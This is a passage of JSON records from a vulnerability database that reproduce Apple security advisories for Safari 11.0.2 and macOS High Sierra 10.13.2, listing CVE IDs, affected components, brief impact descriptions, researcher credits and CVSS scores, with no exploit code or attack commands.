malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. 
This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-09T04:06:11", "title": "About the security content of Safari 11.0.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-04-09T04:06:11", "id": "APPLE:HT208324", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:36", "description": "# About the security content of Safari 11.0.2\n\nThis document describes the security content 
of Safari 11.0.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X 
El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. 
This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 09, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of Safari 11.0.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", 
"CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165"], "modified": "2017-12-06T00:00:00", "id": "APPLE:05865687B681A94EDACF5CD84F56F0EF", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:41:48", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. 
This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. 
\n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. 
This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. 
This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. 
This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel 
Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input 
sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. 
This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bug can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. 
This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-27T08:21:38", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", 
"CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-07T01:01:29", "description": "# About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nThis document describes the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. 
This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. 
\n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. 
This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. 
This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. 
This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel 
